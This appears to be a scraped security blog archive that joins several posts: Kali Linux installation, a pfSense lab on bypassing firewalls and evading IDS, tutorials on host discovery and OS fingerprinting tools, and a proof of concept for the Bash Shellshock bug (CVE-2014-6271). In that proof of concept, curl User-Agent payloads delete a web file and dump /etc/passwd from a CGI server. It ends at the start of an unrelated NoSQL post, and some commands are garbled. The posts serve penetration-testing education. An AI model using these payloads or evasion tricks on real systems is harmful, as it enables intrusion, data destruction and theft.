  • This will present a GUI representation of the partition of your current operating system. Carefully resize it to leave enough space (12 GB minimum) for the Kali installation. 
  • Once the partition has been resized on the hard disk, ensure you select the Apply All Operations option. Exit GParted and reboot Kali Linux.

   Step 3 – Beginning with the Installation:-

  • Once we are back to the home screen, select Graphical install. The initial few screens of the installation will ask you for language selection, location selection, keyboard, and so on. We need to be careful while setting up the root password. The default root password for Kali is toor.
  • Dual boot only Once we are through with this, the next important step is selecting the partition to install the operating system to. We will have to use the same unallocated space that we created moments ago using GParted.
  •  Once the partition is selected, Kali will take over and install the operating system. The process will take some time to complete. After the installation is complete, the system startup screen will now give you the option to boot either in Kali Linux or another operating system, which is called a (dual boot) configuration.

Installing Kali as a virtual machine:-

  • I suggest you to install kali in virtualization software for beginner.  
  • Setting up Kali over virtualization software is easy. Kali officially provides a VMware image that can be downloaded from its official website (http://www.offensive-security.com/kali-linux-vmware-arm-image-download/). It can be imported inside a VMware player, when it starts working.  
  • So we are going to install Kali Linux in VMware Workstation. You have to follow Part 1 to see practically.

Bypassing Firewalls and Avoiding Detection

 Pentest, Security  Comments Off on Bypassing Firewalls and Avoiding Detection
Sep 262014
 
The type and scope of the penetration test will determine the need for being stealthy during a penetration test. The reasons to avoid detection while testing are varied; one of the benefits would include testing the equipment that is supposedly protecting the network, another could be that your client would like to know just how long it would take the Information Technology team to respond to a targeted attack on the environment.

Not only will you need to be wary of the administrators and other observers on the target network, you will also need to understand the automated methods of detection such as web application, network, and host-based intrusion detection systems that are in place to avoid triggering alerts.

NOTE:-When presented with the most opportune target, take the time to validate that it is not some sort of honeypot that has been set up to trigger alerts when abnormal traffic or activity is detected! No
sense in walking into a trap set by a clever administrator. Note that if you do find a system like this it is still very important to ensure it is set up properly and not inadvertently allowing access to critical
internal assets due to a configuration error!

Lab preparation:-

BackTrack, pfSense, and Metasploitable virtual machines should be configured in the following manner:

Kali Linux guest machine:-

This machine will need to be connected to the 192.168.10.0/24 subnet. In the Oracle VM VirtualBox Manager console highlight the Kali Linux instance and select the Settings option from the top navigation bar. Ensure that only one network adapter is enabled. The adapter should use the Vlan1 internal network option.

Now power on your Kali machine and configure IP address manually as follow:
#ifconfig eth0 192.168.10.10 netmask 255.255.255.0 

As the pfSense machine will need to be our router as well, we need to set it up as the default gateway. This can be accomplished as follows:
# route add default gw 192.168.10.1 


Metasploitable guest machine:-

The Metasploitable machine will be used as the target. It needs to be configured to connect to VLAN2, which is a new internal network we have not used before.To create an internal network you will need to manually type VLAN2 into the network configuration screen in the Oracle VM VirtualBox Manager. Your settings should be similar to the following:


pfSense network setup:-

Configuring our firewall is a bit more work. It needs to be able to route restrictive traffic from the VLAN1 network to the VLAN2 subnet. There are several configuration changes we will need to make to ensure this works properly.

Our firewall guest machine will use two network adapters. One will be used for the VLAN1 segment and the other for the VLAN2 segment. VLAN1 will be treated as an untrusted wide area network for the examples within this chapter. Network Adapter 1 should resemble the following screenshot:


Network Adapter 2 should be similar to the following:


Pfsense WAN IP configuration:-

The remaining networking setup will need to be performed from within the guest machine.

1. Boot up your pfSense virtual instance. There may be an additional delay as pfSense attempts to configure the WAN adapter. Allow it to fully load until you see the following menu:




2. The WAN and LAN interfaces will need to be configured properly.Select option 2) Set interface(s) IP address.

3. Select option 1 – WAN.


4. When asked to configure the WAN interface via DHCP type n for no.
5. The IP for the WAN adapter should be 192.168.10.1.
6. Subnet bit count should be set to 24. Type 24 and press Enter.
7. Next is set default gateway in our case 192.168.10.1.
8.Next will ask about IPv6 in our type n and press enter.
9. Finally you got bellow screen:


10. Press Enter again to return to the configuration menu.

Your LAN and WAN IP ranges should match the following:


Pfsense LAN IP configuration:-

We can set up the LAN IP information from the configuration menu as well. One benefit of configuring the LAN here is that we can have a DHCP server configured for VLAN2 at the same time.

1. Select option 2 from the configuration menu to start the LAN IP Configuration module.
2. Choose the LAN interface (Option 2).
3. When prompted to enter the IP address type 192.168.20.1.
4. The bit count should be set to 24.

5. Next is set default gateway in our case 192.168.20.1. 
6. When asked if you would like a DHCP server to be enabled on LAN choose y for yes.
7. DHCP Client IP range start will be 192.168.20.10.
8. DHCP Client IP range stop will be 192.168.20.50



 9. Press Enter again to return to the configuration menu.Your LAN and WAN IP ranges should match the following:


 Firewall configuration:-

pfSense can be configured using its intuitive web interface. Boot up the Kali Linux machine with VLAN2, open a terminal and perform a sudo dhclient to pick up an address from the pfSense DHCP server on VLAN2 (192.168.20.0/24).

In a web browser on the Ubuntu machine type http://192.168.20.1/ to access the configuration panel. If you have reset to factory defaults you will need to step through the wizard to get to the standard console.

Note:-The default username and password combination for pfSense is: admin/pfsense

To view the current firewall rules choose Firewall | Rules and review the current configuration. By default the WAN interface should be blocked from connecting internally as there are not preestablished rules that allow any traffic through. 




For testing purpose, we will enable ports 80, 443, 21, and allow ICMP. Add the rules as follows:
1. Click on the add a new rule button displayed in the preceding screenshot.
2. Use the following rule settings to enable ICMP pass-through:

  • Action: Pass 
  • Interface: WAN
  • Protocol: ICMP
  • All others: Defaults

3. Click on the Save button at the bottom of the screen.
4. Click on the Apply Changes button at the top of the screen.
5. Use the Interface | WAN navigation menu to enter the WAN interface configuration menu and       uncheck Block private networks. Apply the changes and return to Firewall | Rules.





6. Click on the add new rule button.

7. Use the following rule settings to enable HTTP pass-through.

  • Action: Pass 
  • Interface: WAN
  • Protocol: TCP
  • Destination port range: HTTP

8. Continue adding ports until the configuration matches the following:


At this point any machine connected to VLAN1 can communicate through the open ports as well as ping machines on the VLAN2 segment as can be seen in the following screenshot



Finding out if the firewall is blocking certain ports:-

There is a firewall; now what? The next step is to determine which ports are being blocked by the firewall, or more importantly which are open.

Hping:-

 Hping2 and Hping3 are included as part of the Kali Linux distribution. It can be accessed via the GUI navigation bar Applications | Kali Linux | Information Gathering | Live Host Identify Live Hosts | Hping3. It can also be invoked at the command line by simply typing: hping2. Hping2 is a powerful tool that can be used for various security testing tasks. The following syntax can be used to find open ports while remaining fully in control of your scan:
# hping3 -S 192.168.20.11 -c 80 -p ++1


 This command allowed us to perform a SYN scan starting at port 1 and incrementing for 80 steps.

Depending on the firewall configuration it may also be possible to send spoofed packets. During a test it is beneficial to ensure that the configuration does not allow for this behavior to occur. Hping is perfectly suited for this task. The following is an example of how you may test if the firewall allows this traffic to pass:
#hping3 -c 10 -S –spoof 192.168.20.11 -p 80 192.168.20.100

This command will spoof 10 packets from 192.168.20.11 to port 80 on 192.168.20.100. This is the basis for an idle scan and if successful would allow you to hping the 192.168.20.11 machine to look for an increase in the IP sequence number. In this case we could enable monitoring on the pfSense machine to emulate what this traffic looks like to a network administrator reviewing the logs.


Challenge yourself to create and monitor different packets and uses of Hping so that you can gain a good understanding of the traffic flow. The best means of remaining undetected while testing is to fully understand the technology that is being used. Take a look at the logs generated from a successful scan and keep in mind that due to the amount of traffic involved even secured networks will sometimes only log and trigger events based on denied traffic.


 Note:-Logging per rule will need to be enabled on the firewall to see allowed traffic. Not logging permitted traffic is fairly standard practice as it reduces the firewall log size. Educate your clients that proactively monitoring allowed traffic can also be beneficial when attempting to truly secure a network.

Nmap firewalk script:-

One of the easiest methods to test open ports on a firewall is to simply use the firewalking script for Nmap. To test the open firewall ports you will need a host behind the firewall as the target:
#nmap –script=firewalk –traceroute 192.168.20.11


The command sequence is straightforward and familiar: we invoke nmap, use the script option, and choose the firewalk script. We then provide the input that firewalk needs by performing a traceroute to 192.168.20.11 which we know is behind our target firewall. 


 Although we were able to determine which ports on the firewall were open (21, 80, and 443), if you take a look at the firewall denies it quickly becomes apparent that this is not a quiet test and should only be used when stealth is not needed. What this boils down to is that stealth requires patience and a well made plan of action. It may be easier to manually verify if there are any common ports open on the firewall and then try to scan using one of the well-known ports.




Avoiding IDS:-

In a secured environment you can count on running into IDS and IPS. Properly configured and used as part of a true defense in depth model increases their effectiveness tremendously. This means that the IDS will need to be properly updated, monitored, and used in the proper locations. A penetration tester will be expected to verify that the IDS’s are working properly in conjunction with all other security controls to properly protect the environment.

The primary method of bypassing any IDS is to avoid signatures that are created to look for specific patterns. These signatures must be fine-tuned to find only positively malicious behavior and should not be so restrictive that alerts are triggered for normal traffic patterns. Over the years, the maturity level of these signatures has increased significantly, but a penetration tester or knowledgeable attacker will be able to use various means to bypass even the most carefully crafted signatures. In this section, we review some of the methods that have been used by attackers in the wild.



Canonicalization Technique:-

Canonicalization refers to the act of substituting various inputs for the canonical name of a file or path. This practice can be as simple as substituting hexadecimal representations ASCII text values. Here is an example of an equivalent string:

• String A in Hex: “54:68:69:73:20:69:73:20:61:20:73:74:72:69:6e:67”
• String A in text: “This is a string”
• String A in ASCII: “084 104 105 115 032 105 115 032 097 032 115 116 114 105 110 103” 


By taking advantage of the fact there are sometimes literally thousands of combinations possible for a single URL. To put this into perspective, let’s take a look at the address we can use to get from our browser to our local Apache server:
#htpp://3232240651/

Luckily, this address confuses our Apache server and we receive the following message:


 The previous request attempted to load the local page at 127.0.0.1. Let’s see what occurs when we try to load the remote pfSense administration console in the same manner:
#http://2130706433/

Here we are warned by the web server hosti
ng the pfSense administrative console that a potential DNS Rebind attack occurred:


 Let’s try something else that actually works properly:

In the console, ping one of the addresses we listed above:

 #ping 3232240651



As we can see, the IP address resolved properly and we receive our replies as expected. This very same concept is key when trying to bypass an IDS rule. If the type of IDS can be determined, then it should be possible to get the signatures. When reviewing these signatures you would look for opportunities to obscure the URLs, filenames, or other path information enough that it is able to bypass the existing ruleset.

Copyrighted.com Registered & Protected  PEFP-9CI3-OR05-ELXG

August 26, 2014

Hacking – Operating System Fingerprinting using Different Tools & Techniques

Hacking – Operating System Fingerprinting using Different Tools & Techniques

After we know that the target machine is a live, we can then find out the operating system used by the target machine. This method is commonly known as Operating System (OS) fingerprinting.
There are two methods of doing OS fingerprinting:

  • active
  • passive

In the active method, the tool sends network packets to the target machine and then determines the operating system of the target machine based on the analysis done on the response it has received. The advantage of this method is that the fingerprinting process is fast. However, the disadvantage is that the target machine may notice our attempt to get its operating system’s information.

To overcome the active method’s disadvantage, there exists a passive method of OS fingerprinting. This method was pioneered by Michal Zalewsky when he released a tool called p0f. The disadvantage of the passive method is that the process will be slower than the active method.

In this section, we will describe a couple of tools that can be used for OS fingerprinting.

p0f:-

The p0f tool is used to fingerprint an operating system passively. It can be used to identify an operating system on the following machines:

Machines that connect to your box (SYN mode; this is the default mode)
Machines you connect to (SYN+ACK mode)
Machines you cannot connect to (RST+ mode)
Machines whose communications you can observe


The p0f tool works by analyzing the TCP packets sent during the network activities. Then, it gathers the statistics of special packets that are not standardized by default by any corporations.



An example is that the Linux kernel uses a 64-byte ping datagram, whereas the Windows operating system uses a 32-byte ping datagram; or the Time To Live (TTL ) value. For Windows, the TTL
value is 128, while for Linux this TTL value varies between the Linux distributions. These information are then used by p0f to determine the remote machine’s operating system.


To use new version of p0f, just download the file from http://lcamtuf.coredump.cx/p0f3/releases/p0f-3.07b.tgz
Download and extract that file and relocate that folder Now Let’s use p0f to identify the operating system used in a remote machine we are connecting to. Just type the following command in your console:
#p0f -f p0f.fp -o log.log

This will read the fingerprint database from the /root/p0f-3.07b/p0f.fp file and save the log information to the log.log file. It will then display the following information:



Next, you need to generate network activities involving a TCP connection, such as browsing to the remote machine or letting the remote machine to connect to your machine.
I use Netcat in another terminal for do that
#nc 192.168.198.131 80

If p0f has successfully fingerprinted the operating system, you will see information of the remote machine’s operating system in the console and in the log file.



Based on the preceding result, we know that the target is a Linux 2.6.x machine.

The following screenshot shows the information from the target machine:


By comparing this information, we know that p0f got the OS information correctly. The remote machine is using Linux Version 2.6.You can stop p0f by pressing the Ctrl + C key combination.

Nmap:-

Nmap is a very popular and capable port scanner. Besides this, it can also be used to fingerprint a remote machine’s operating system. It is an active fingerprinting tool. To use this feature, you can give the -O option to the nmap command.



For example, if we want to fingerprint the operating system used on the 192.168.198.131 machine, we use the following command:
#nmap –O 192.168.198.131




Nmap was able to get the correct operating system information after fingerprinting the operating system of a remote machine. Copyrighted.com Registered & Protected  PEFP-9CI3-OR05-ELXG

August 19, 2014

Identifying the Target Machine using Different Tools & Technique

Identifying the Target Machine using Different Tools & Technique 

The tools included in this category are used to identify the target machines that can be accessed by a penetration tester. Before we start the identification process, we need
to know our client’s terms and agreements. If the agreements require us to hide pen-testing activities, we need to conceal our penetration testing activities. Stealth technique may also be applied for testing the Intrusion Detection System (IDS) or Intrusion Prevention System (IPS) functionality. If there are no such requirements, we may not need to conceal our penetration testing activities.


ping:-

 The ping tool is the most famous tool that is used to check whether a particular host is available. The ping tool works by sending an Internet Control Message Protocol (ICMP) echo request packet to the target host. If the target host is available and the firewall is not blocking the ICMP echo request packet, it will reply with the ICMP echo reply packet.



Note:-The ICMP echo request and ICMP echo reply are two of the available ICMP control messages.

Although you can’t find ping in the Kali Linux menu, you can open the console and type the ping command with its options.

To use ping, you can just type ping and the destination address as shown in the following screenshot:
#Ping 192.168.126.130
 


In Kali Linux, by default, ping will run continuously until you press Ctrl + C.

The ping tool has a lot of options, but the following are a few options that are often used:

• The -c count: This is the number of echo request packets to be sent.
• The -I interface address: This is the network interface of the source address. The argument may 

                                          be a numeric IP address (such as 192.168.56.102) or the name of the  
                                          device (such as eth0). This option is required if you want to ping the 
                                          IPv6 link-local address.
• The -s packet size: This specifies the number of data bytes to be sent. The default is 56 bytes, 

                                 which translates into 64 ICMP data bytes when combined with the 8 bytes of 
                                 the ICMP header data.

Let’s use the preceding information in practice.

Suppose you are starting with internal penetration testing work. The customer gave you access to their network using a LAN cable. And, they also gave you the list of target servers’ IP addresses.
 
The first thing you would want to do before launching a full penetration testing arsenal is to check whether these servers are accessible from your machine. You can use ping for this task.
 
The target server is located at 192.168.126.130, while your machine has an IP address of 192.168.126.129. To check the target server availability, you can give the following command:
#ping -c 1 192.168.126.130
The following screenshot is the result of the preceding ping command:
Note:-ping also accepts hostnames as the destination.
From the preceding screenshot, we know that there is one ICMP echo request packet sent to the destination (IP address: 192.168.126.130). Also, the sending host (IP address: 192.168.126.129) received one ICMP echo reply packet. The round-trip time required is 1.326 ms, and there is no packet loss during the process.
Let’s see the network packets that are transmitted and received by our machine. We are going to use Wireshark, a network protocol analyzer, on our machine to capture these packets, as shown in the following screenshot:
From the preceding screenshot, we can see that our host (192.168.126.130) sent one ICMP echo request packet to the destination host (192.168.126.129). Since the destination is alive and allows the ICMP echo request packet, it will send the ICMP echo reply packet back to our machine.
If your target is using an IPv6 address, such as fe80::20c:29ff:fee1:96df, you can use the ping6 tool to check its availability. You need to give the -I option for the command to work against the link-local address:
The following screenshot shows the packets sent to complete the ping6 request:
From the preceding screenshot, we know that ping6 is using the ICMPv6 request and reply.
Security Tip:-To block the ping request, the firewall can be configured to only allow the ICMP echo request packet from a specific host and drop the packets sent from other hosts.

arping:-

The arping tool is used to ping a host in the Local Area Network (LAN) using the Address Resolution Protocol (ARP) request. You can use arping to ping a target machine using its IP, host, or Media Access Control (MAC) address.
The arping tool operates on Open System Interconnection (OSI) layer 2 (network layer), and it can only be used in a local network. Moreover, ARP cannot be routed across routers or gateways.

To start arping, you can use the console to execute the following command:
# arping

This will display brief usage information on arping.
You can use arping to get the target host’s MAC address:
# arping 192.168.126.130 -c 1
From the previous command output, we can see that the target machine has a MAC address of 00:0c:29:e1:96:df.
Let’s observe the network packets captured by Wireshark on our machine during the arping process:
From the preceding screenshot, we can see that our network card (MAC address: Vmware_e1:96:df) sends an ARP request to a broadcast MAC address (Vmware_46:15:dc), looking for the IP address 192.168.126.130. If the IP address 192.168.126.130 exists, it will send an ARP reply mentioning its MAC address (Vmware_46:15:dc), as can be seen from packet number 2.
However, if the IP address is not available, there will be no ARP replies, informing the MAC address of the 192.168.126.129 IP address, as can be seen from the following screenshot:
Another common use of arping is to detect duplicate IP addresses in a local network. For example, your machine is usually connected to a local network using an IP address of 192.168.126.40; one day, you would like to change the IP address. Before you can use the new IP address, you need to check whether that particular IP address has already been used.
You can use the following arping command to help you detect whether the IP address of 192.168.126.140 has been used:
# arping -d -i eth0 192.168.126.140 -c 2
# echo $?
If the code returns 0, it means that the IP address is available.Whereas, if the code returns 1, it means that the IP address of 192.168.126.140 has been used by more than one machine.



fping:-

The difference between ping and fping is that the fping tool can be used to send a ping (ICMP echo) request to several hosts at once. You can specify several targets on the command line, or you can use a file containing the hosts to be pinged.

In the default mode, fping works by monitoring the reply from the target host. If the target host sends a reply, it will be noted and removed from the target list. If the host doesn’t respond for a certain time limit, it will be marked as unreachable.

By default, fping will try to send three ICMP echo request packets to each target.

To access fping, you can use the console to execute the following command:
# fping -h

This will display the description of usage and options available in fping.

The following scenarios will give you an idea of the fping usage:

If we want to know the alive hosts of 192.168.126.129, 192.168.126.130 and 192.168.126.2 at once, we can use the following command:
#fping 192.168.126.129 192.168.126.130 192.168.126.2

The following is the result of the preceding command:


We can also generate the host list automatically without defining the IP addresses one by one and identifying the alive hosts. Let’s suppose we want to know the alive hosts in the 192.168.56.0 network; we can use the -g option and define the network to check, using the following command:
# fping -g 192.168.126.0/24

The result for the preceding command is as follows:


If we want to change the number of ping attempts made to the target, we can use the -r option (retry limit) as shown in the following command line. By default, the number of ping attempts is three.
#fping -r 1 -g 192.168.126.130 192.168.126.2

The result of the command is as follows:


Displaying the cumulative statistics can be done by giving the -s option (print cumulative statistics) as follows:
#fping -s www.yahoo.com www.google.com www.msn.com

The following is the result of the preceding command line:


hping3:-

The hping3 tool is a command-line network packet generator and analyzer tool. The capability to create custom network packets allows hping3 to be used for TCP/IP and security testing, such as port scanning, firewall rule testing, and network performance testing.



• Test firewall rules
• Test Intrusion Detection System (IDS)
• Exploit known vulnerabilities in the TCP/IP stack


To access hping3, go to the console and type hping3. You can give commands to hping3 in several ways, via the command line, interactive shell, or script.

Without any given command-line options, hping3 will send a null TCP packet to port 0.

In order to change to a different protocol, you can use the following options in the command line to define the protocol:

When using the TCP protocol, we can use the TCP packet without any flags (this is the default behavior) or we can give one of the following flag options:


 Let’s use hping3 for several cases as follows:

Send one ICMP echo request packet to a 192.168.126.130 machine. The options used are -1 (for the ICMP protocol) and -c 1 (to set the count to one packet):
#hping3 -1 192.168.126.130 -c 1

The following is the output of the command:



From the preceding output, we can note that the target machine is alive because it has replied to our ICMP echo request. To verify this, we captured the traffic using tcpdump and the following screenshot shows the packets:

We can see that the target has responded with an ICMP echo reply packet.

Besides giving the options in the command line, you can also use hping3 interactively. Open the console and type hping3. You will then see a prompt where you can type your Tcl commands.

For the preceding example, the following is the corresponding Tcl script:
hping send {ip(daddr=192.168.56.101)+icmp(type=8,code=0)}

Open a command-line window and give the following command to get a response from the target server:
#hping recv eth0

After that, open another command-line window to input the sending request.

The following screenshot shows the response received:


• You can also use hping3 to check for a firewall rule. Let’s suppose you have the following firewall rules:
                  ° Accept any TCP packets directed to port 22 (SSH)
                  ° Accept any TCP packets related with an established connection
                  ° Drop any other packets

To check these rules, you can give the following command in hping3 in order to send an ICMP echo request packet:
#hping3 -1 192.168.126.130 -c 1

The following code is the result:


We can see that the target machine has responded to our ping probe.

nping:-

The nping tool is a tool that allows users to generate network packets of a wide range of protocols (TCP, UDP, ICMP, and ARP). You can also customize the fields in the protocol headers, such as the source and destination port for TCP and UDP. The difference between nping and other similar tools such as ping is that nping supports multiple target hosts and port specification.

It can be used to send an ICMP echo request just like in the ping command. nping can also be used for network stress testing, Address Resolution Protocol (ARP) poisoning, and the denial of service attacks.

In Kali Linux, nping is included with the Nmap package.The following are several probe modes supported by nping:


You need to open a console and type nping. This will display the usage and options’ description.
In order to use nping to send an ICMP echo request to the target machines 192.168.198.129, 192.168.198.130, and 192.168.198.131, you can give the following command:

#nping -c 1 192.168.198.129-131
The following screenshot shows the command output:

From the preceding screenshot, we know that only the 192.168.198.131 machine is sending back the ICMP echo reply packet.
If the machine is not responding to the ICMP echo request packet ,you can still find out whether it is alive by sending a TCP SYN packet to an open port in that machine.For example, to send one (-c 1) TCP packet (–tcp) to the IP address 192.168.198.131 port 22 (-p 22), you can give the following command:

#nping –tcp -c 1 -p 22 192.168.198.131

Of course, you need to guess the ports which are open. We suggest that you try with the common ports, such as 21, 22, 23, 25, 80, 443, 8080, and 8443.

The following screenshot shows the result of the mentioned example:

From the preceding result, we can see that the remote machine (192.168.198.131) is alive because when we sent the TCP packet to port 22, the target machine responded.

alive6:-

If you want to discover which machines are alive in an IPv6 environment, you can’t just ask the tool to scan the whole network. This is because the address space is very huge. You may find that the machines have a 64-bit network range. Trying to discover the machines sequentially in this network will require at least 264 packets. Of course, this is not a feasible task in the real world.
Fortunately, there is a protocol called ICMPv6 Neighbor Discovery. This protocol allows an IPv6 host to discover the link-local and autoconfigured addresses of all other IPv6 systems on the local network. In short, you can use this protocol to find a live host on the local network subnet.
To help you do this, there is a tool called alive6, which can send an ICMPv6 probe and is able to listen to the responses. This tool is part of the THC-IPv6 Attack Toolkit developed by van Hauser from The Hackers Choice group.
Suppose you want to find the active IPv6 systems on your local IPv6 network, the following command can be given with the assumption that the eth0 interface is connected to the LAN:

#alive6 -p eth0

detect-new-ip6:-

This tool can be used if you want to detect the new IPv6 address joining a local network. This tool is part of the THC-IPv6 Attack Toolkit developed by van Hauser from The Hackers Choice group.
To access detect-new-ipv6, go to the console and type detect-new-ipv6. This will display the usage information.
Following is a simple usage of this tool; we want to find the new IPv6 address that joined the local network:

#detect-new-ip6 eth0

passive_discovery6:-

This tool can be used if you want to sniff out the local network to look for the IPv6 address. This tool is part of the THC-IPv6 Attack Toolkit developed by van Hauser from The Hackers Choice group. Getting the IPv6 address without being detected by an IDS can be useful.

To access passive_discovery6, go to the console and type passive_discovery6. This will display the usage information on the screen.The following command is an example of running this tool:
#passive_discovery6 eth0
This tool simply waits for the ARP request/reply by monitoring the network, and then it maps the answering hosts. The following are the IPv6 addresses that can be discovered by this tool on the network:

• fe80::539:3035:77a4:dc68

• fe80::20c:29ff:fee1:96df

nbtscan:-

If you are doing an internal penetration testing on a Windows environment, the first thing you want to do is get the NetBIOS information. One of the tools that can be used to do this is nbtscan.
The nbtscan tool will produce a report that contains the IP address, NetBIOS computer name, services available, logged in username, and MAC address of the corresponding machines. The NetBIOS name is useful if you want to access the service provided by the machine using the NetBIOS protocol that is connected to an open share. Be careful as using this tool will generate a lot of traffic and it may be logged by the target machines.

To access nbtscan, you can open the console and type nbtscan. As an example, I want to find out the NetBIOS name of the computers located in my network (192.168.198.0/24). The following is the command to be used:

#nbtscan 192.168.198.1-254



From the preceding result, we are able to find three NetBIOS names, METASPLOITABLE.

Let’s find the service provided by these machines by giving the following command:

#nbtscan -hv 192.168.198.1-254

Option -h will print the service in a human-readable name. While, option -v will give more verbose output information.


From the preceding result, we can see that there are many services available on METASPLOITABLE: Workstation,Messanger,File Server etc. In our experience, this information is very useful because we know which machine has a file sharing service. Next, we can continue to check whether the file sharing services are open so that we can access the files stored on those file sharing services.
URL: http://kungfuhacking.blogspot.in

CVE-2014-6271

 Security  Comments Off on CVE-2014-6271
Sep 252014
 
A fun Bash bug: it doesn’t stop interpreting a variable at the end of a functions, and is, therefore, susceptible to arbitrary command execution. If you’re using CGIs, this becomes RCE.
For this example, I’ve chosen to abuse the user-agent setting:
1
2
3
$ curl http://192.168.0.1/target
 
PoC||GTFO
Great, we get a page. Now lets go looking for a CGI script… and as it happens, we’ve found one, poc.cgi:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/bin/bash
 
echo “Content-type: text/html”
echo “”
 
echo ‘<html>’
echo ‘<head>’
echo ‘<meta http-equiv=”Content-Type” content=”text/html; charset=UTF-8″>’
echo ‘<title>PoC</title>’
echo ‘</head>’
echo ‘<body>’
echo ‘<pre>’
/usr/bin/env
echo ‘</pre>’
echo ‘</body>’
echo ‘</html>’
 
exit 0
Requesting this CGI gives a nice picture of the environment:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$ curl http://192.168.0.1/poc.cgi
 
<html>
<head>
<meta httpequiv=“Content-Type” content=“text/html; charset=UTF-8”>
<title>PoC</title>
</head>
<body>
<pre>
SERVER_SIGNATURE=<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
 
HTTP_USER_AGENT=curl/7.26.0
SERVER_PORT=80
HTTP_HOST=192.168.0.1
DOCUMENT_ROOT=/var/www
SCRIPT_FILENAME=/var/www/poc.cgi
REQUEST_URI=/poc.cgi
SCRIPT_NAME=/poc.cgi
REMOTE_PORT=40974
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/var/www
SERVER_ADMIN=webmaster@localhost
HTTP_ACCEPT=*/*
REMOTE_ADDR=192.168.0.1
SHLVL=1
SERVER_NAME=192.168.0.1
SERVER_SOFTWARE=Apache/2.2.22 (Debian)
QUERY_STRING=
SERVER_ADDR=192.168.0.1
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
_=/usr/bin/env
</pre>
</body>
</html>
Now, using the Bash bug, and the handy flag for setting the user-agent with curl, we do the following evil thing:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ curl A “() { :; }; /bin/rm /var/www/target” http://192.168.0.1/poc.cgi
 
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
webmaster@localhost and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
</body></html>
Notice that I’ve used a path that is owned by the webserver to avoid permission issues. Also, in quick testing, anything that wrote to STDOUT caused header errors. I even tried sending the content type in the user-agent definition. Back to checking on the damage that we have done:
1
2
3
4
5
6
7
8
9
10
11
$ curl http://192.168.0.1/target
 
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head< span style="border: 0px; color: rgb(172, 153, 171) !important; font-family: inherit; font-size: inherit !important; font-style: inherit; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /target was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
</body></html>
So there it is, RCE for a Bash CGI script.

Update 1:

Getting around the STDOUT issue wrecking headers is easier than I thought; cat the file and redirect the output, then fetch the file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ curl A ‘() { :; }; /bin/cat /etc/passwd > dumped_file’ http://192.168.0.1/poc.cgi
 
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
webmaster@localhost and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
</body></html>
and the fetch:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ curl http://192.168.0.1/dumped_file
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
wwwdata:x:33:33:wwwdata:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats BugReporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debianexim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin

 Update 2:

Seeing some slick reverse shells now on pastebin. This is going to be nasty, especially on embedded systems that aren’t using busybox.

Update 3:

Talked with @loganattwood OOB about timing attacks against DHCP lease expiry & passing shellcode via DHCP options. Nice privilege escalation scenario.

Cassandra vs MongoDB vs CouchDB vs Redis vs Riak vs HBase vs Couchbase vs OrientDB vs Aerospike vs Neo4j vs Hypertable vs ElasticSearch vs Accumulo vs VoltDB vs Scalaris comparison

 Database  Comments Off on Cassandra vs MongoDB vs CouchDB vs Redis vs Riak vs HBase vs Couchbase vs OrientDB vs Aerospike vs Neo4j vs Hypertable vs ElasticSearch vs Accumulo vs VoltDB vs Scalaris comparison
Sep 242014
 

(Yes it’s a long title, since people kept asking me to write about this and that too 🙂 I do when it has a point.)
While SQL databases are insanely useful tools, their monopoly in the last decades is coming to an end. And it’s just time: I can’t even count the things that were forced into relational databases, but never really fitted them. (That being said, relational databases will always be the best for the stuff that has relations.)
But, the differences between NoSQL databases are much bigger than ever was between one SQL database and another. This means that it is a bigger responsibility on software architectsto choose the appropriate one for a project right at the beginning.
